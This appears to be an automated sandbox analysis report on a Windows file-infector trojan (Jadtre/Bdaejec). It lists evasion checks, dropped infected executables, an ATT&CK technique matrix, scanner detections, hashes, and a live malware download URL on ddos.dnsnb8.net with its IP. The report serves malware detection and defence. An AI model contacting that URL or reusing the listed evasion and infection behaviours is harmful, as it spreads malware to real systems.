    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-1062
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-6984
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeCode function: 2_2_00BC1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00BC1754h2_2_00BC1718
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeCode function: 2_2_00BC29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_00BC29E2
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeCode function: 2_2_00BC2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00BC2B8C
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
    Source: Amcache.hve.2.drBinary or memory string: VMware
    Source: Amcache.hve.2.drBinary or memory string: VMware Virtual USB Mouse
    Source: lhwmJX.exe, 00000002.00000002.1583940679.00000000004E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(dK%SystemRoot%\system32\mswsock.dll
    Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.2.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.2.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.2.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.2.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.2.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: lhwmJX.exe, 00000002.00000002.1583940679.00000000004A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3
    Source: lhwmJX.exe, 00000002.00000002.1583940679.0000000000516000.00000004.00000020.00020000.00000000.sdmp, lhwmJX.exe, 00000002.00000003.1253042614.0000000000516000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.2.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.2.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.2.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.2.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.2.drBinary or memory string: vmci.sys
    Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.2.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.2.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.2.drBinary or memory string: VMware20,1
    Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.2.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.2.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.2.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.2.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.2.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.2.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.2.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.2.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.2.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
    Source: Amcache.hve.2.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeAPI call chain: ExitProcess graph end nodegraph_2-1036
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeCode function: 0_2_00401EE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401EE2
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeCode function: 0_2_00409577 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00409577
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeCode function: 0_2_00414044 mov eax, dword ptr fs:[00000030h]0_2_00414044
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeCode function: 0_2_0040CCDB CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_0040CCDB
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeCode function: 0_2_00401EE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401EE2
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeCode function: 0_2_00405FD0 SetUnhandledExceptionFilter,0_2_00405FD0
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeCode function: 0_2_004097D7 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,0_2_004097D7
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeCode function: 0_2_00403594 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00403594
    Source: SciTE.exe.2.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeCode function: GetLocaleInfoA,0_2_0040A79A
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeCode function: 0_2_00406478 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00406478
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeCode function: 2_2_00BC139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,2_2_00BC139F
    Source: Amcache.hve.2.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.2.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.2.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.2.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: Amcache.hve.2.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: lhwmJX.exe PID: 6052, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: lhwmJX.exe PID: 6052, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
    Native API
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    1
    Masquerading
    11
    Input Capture
    11
    System Time Discovery
    1
    Taint Shared Content
    11
    Input Capture
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts2
    Process Injection
    1
    Access Token Manipulation
    LSASS Memory131
    Security Software Discovery
    Remote Desktop Protocol1
    Archive Collected Data
    11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    2
    Process Injection
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information
    NTDS3
    File and Directory Discovery
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
    Obfuscated Files or Information
    LSA Secrets13
    System Information Discovery
    SSHKeylogging12
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
    Software Packing
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    ArjM1qx3hV.exe86%VirustotalBrowse
    ArjM1qx3hV.exe95%ReversingLabsWin32.Virus.Jadtre
    ArjM1qx3hV.exe100%AviraW32/Jadtre.B
    ArjM1qx3hV.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
    C:\Users\user\AppData\Local\Temp\lhwmJX.exe100%AviraTR/Dldr.Small.Z.haljq
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
    C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\lhwmJX.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\lhwmJX.exe97%ReversingLabsWin32.Trojan.Skeeyah
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://www.smartsharesystems.com/Morten0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k1.raroC:100%Avira URL Cloudmalware
    http://www.activestate.com0%Avira URL Cloudsafe
    http://www.rftp.comJosiah0%Avira URL Cloudsafe
    http://www.activestate.comHolger0%Avira URL Cloudsafe
    http://www.develop.com0%Avira URL Cloudsafe
    http://www.scintilla.org/scite.rng0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k1.rarcdp100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k1.rars100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k1.rar100%Avira URL Cloudmalware
    http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k1.rarp100%Avira URL Cloudmalware
    http://www.spaceblue.com0%Avira URL Cloudsafe
    http://www.rftp.com0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k1.rarm100%Avira URL Cloudmalware
    http://www.develop.comDeepak0%Avira URL Cloudsafe
    http://www.baanboard.com0%Avira URL Cloudsafe
    http://www.baanboard.comBrendon0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k1.rarf100%Avira URL Cloudmalware
    https://www.smartsharesystems.com/0%Avira URL Cloudsafe
    http://www.scintilla.org0%Avira URL Cloudsafe
    http://www.spaceblue.comMathias0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    ddos.dnsnb8.net
    44.221.84.105
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://ddos.dnsnb8.net:799/cj//k1.rartrue
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://www.smartsharesystems.com/MortenSciTE.exe.2.drfalse
      • Avira URL Cloud: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.raroC:lhwmJX.exe, 00000002.00000002.1583940679.0000000000516000.00000004.00000020.00020000.00000000.sdmp, lhwmJX.exe, 00000002.00000003.1253042614.0000000000516000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      http://www.scintilla.org/scite.rngSciTE.exe.2.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.develop.comSciTE.exe.2.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.lua.orgSciTE.exe.2.drfalse
        high
        http://www.rftp.comJosiahSciTE.exe.2.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.activestate.comSciTE.exe.2.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.activestate.comHolgerSciTE.exe.2.drfalse
        • Avira URL Cloud: safe
        unknown
        http://ddos.dnsnb8.net:799/cj//k1.rarcdplhwmJX.exe, 00000002.00000002.1583940679.000000000048E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://ddos.dnsnb8.net:799/cj//k1.rarslhwmJX.exe, 00000002.00000003.1253042614.000000000050C000.00000004.00000020.00020000.00000000.sdmp, lhwmJX.exe, 00000002.00000002.1583940679.000000000050C000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DElhwmJX.exe, 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmp, lhwmJX.exe, 00000002.00000003.1232301842.00000000008B0000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.spaceblue.comSciTE.exe.2.drfalse
        • Avira URL Cloud: safe
        unknown
        http://ddos.dnsnb8.net:799/cj//k1.rarplhwmJX.exe, 00000002.00000002.1584584545.000000000226A000.00000004.00000010.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://upx.sf.netAmcache.hve.2.drfalse
          high
          http://www.baanboard.comSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://www.rftp.comSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://ddos.dnsnb8.net:799/cj//k1.rarmlhwmJX.exe, 00000002.00000003.1253042614.000000000050C000.00000004.00000020.00020000.00000000.sdmp, lhwmJX.exe, 00000002.00000002.1583940679.000000000050C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://www.develop.comDeepakSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://www.baanboard.comBrendonSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://ddos.dnsnb8.net:799/cj//k1.rarflhwmJX.exe, 00000002.00000003.1253042614.000000000050C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          https://www.smartsharesystems.com/SciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://www.scintilla.orgSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://www.spaceblue.comMathiasSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          44.221.84.105
          ddos.dnsnb8.netUnited States
          14618AMAZON-AESUSfalse
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1581655
          Start date and time:2024-12-28 12:25:05 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 34s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:20
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:ArjM1qx3hV.exe
          renamed because original name is a hash value
          Original Sample Name:2024-12-28_3840cfa13afb95c493fc98d766946229.exe
          Detection:MAL
          Classification:mal100.spre.troj.evad.winEXE@6/12@1/1
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 99%
          • Number of executed functions: 19
          • Number of non-executed functions: 23
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 20.42.73.29, 40.126.53.18, 13.107.246.63, 4.175.87.197
          • Excluded domains from analysis (whitelisted): login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          TimeTypeDescription
          08:17:15API Interceptor1x Sleep call for process: WerFault.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          44.221.84.105yRc7UfFif9.exeGet hashmaliciousBdaejecBrowse
          • ddos.dnsnb8.net:799/cj//k1.rar
          gT6IitwToH.exeGet hashmaliciousBdaejecBrowse
          • ddos.dnsnb8.net:799/cj//k1.rar
          REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
          • saytjshyf.biz/xoqfqirqhp
          HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
          • npukfztj.biz/edmrjb
          http://setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.comGet hashmaliciousUnknownBrowse
          • setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com/favicon.ico
          HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
          • saytjshyf.biz/eglmpsrvxnyx
          HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
          • saytjshyf.biz/peioi
          PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
          • npukfztj.biz/cbecuogqej
          Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
          • saytjshyf.biz/bkq
          invoice_96.73.exeGet hashmaliciousFormBookBrowse
          • jhvzpcfg.biz/tgcwttfqletfhyq
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          ddos.dnsnb8.netgT6IitwToH.exeGet hashmaliciousBdaejecBrowse
          • 44.221.84.105
          #U65b0#U7248#U7f51#U5173.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
          • 44.221.84.105
          #U8865#U4e01#U6253#U5305.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
          • 44.221.84.105
          #U65b0#U7248#U7f51#U5173Srv.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
          • 44.221.84.105
          gE4NVCZDRk.exeGet hashmaliciousBdaejec, RunningRATBrowse
          • 44.221.84.105
          ib.exeGet hashmaliciousBdaejecBrowse
          • 44.221.84.105
          SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeGet hashmaliciousBdaejecBrowse
          • 44.221.84.105
          1hdqYXYJkr.exeGet hashmaliciousBdaejecBrowse
          • 44.221.84.105
          7Y18r(193).exeGet hashmaliciousBdaejec, StealcBrowse
          • 44.221.84.105
          BUG32.exeGet hashmaliciousBdaejecBrowse
          • 44.221.84.105
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          AMAZON-AESUSaRxo3E278B.exeGet hashmaliciousBdaejecBrowse
          • 44.221.84.105
          yRc7UfFif9.exeGet hashmaliciousBdaejecBrowse
          • 44.221.84.105
          gT6IitwToH.exeGet hashmaliciousBdaejecBrowse
          • 44.221.84.105
          a2mNMrPxow.exeGet hashmaliciousUnknownBrowse
          • 3.218.7.103
          SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
          • 34.226.108.155
          TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
          • 3.218.7.103
          FIyDwZM4OR.exeGet hashmaliciousUnknownBrowse
          • 3.218.7.103
          ZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
          • 3.218.7.103
          e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
          • 3.218.7.103
          HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
          • 34.226.108.155
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Temp\lhwmJX.exeaRxo3E278B.exeGet hashmaliciousBdaejecBrowse
            yRc7UfFif9.exeGet hashmaliciousBdaejecBrowse
              gT6IitwToH.exeGet hashmaliciousBdaejecBrowse
                #U65b0#U7248#U7f51#U5173.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                  #U8865#U4e01#U6253#U5305.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                    #U65b0#U7248#U7f51#U5173Srv.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                      gE4NVCZDRk.exeGet hashmaliciousBdaejec, RunningRATBrowse
                        ib.exeGet hashmaliciousBdaejecBrowse
                          SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeGet hashmaliciousBdaejecBrowse
                            8VB4lVuZk3.exeGet hashmaliciousBdaejecBrowse
                              Process:C:\Users\user\AppData\Local\Temp\lhwmJX.exe
                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):19456
                              Entropy (8bit):6.590528850272501
                              Encrypted:false
                              SSDEEP:384:1F6S4XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:rQQGPL4vzZq2o9W7GsxBbPr
                              MD5:6562E367100163BFC7401C8DC09A4D85
                              SHA1:77952B60848D77362246116F938F7BED3886E3D2
                              SHA-256:5A5026FC40DF76F4FEA9DB8B02395B0A119D0B095520B949C7815EB89F02130C
                              SHA-512:0C802D8402813DAD0A0D202FA250C30762FB980DA5734329257DE2BC61C63378C73D23C4AE90098E8997EC498D796C479C296CC52728079CD6C1C0526CFD6694
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:low
                              Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                              Process:C:\Users\user\AppData\Local\Temp\lhwmJX.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):2389504
                              Entropy (8bit):6.731343079129651
                              Encrypted:false
                              SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                              MD5:3E995A1872E0B4EA0334F0C0570947DA
                              SHA1:3CFC2C12329AE225307EF992BE0328FABD51A2B0
                              SHA-256:FAFD7BB8D2C31D040BC085989459F45EF7C70B8F8111583ED79ADA2322CDDF55
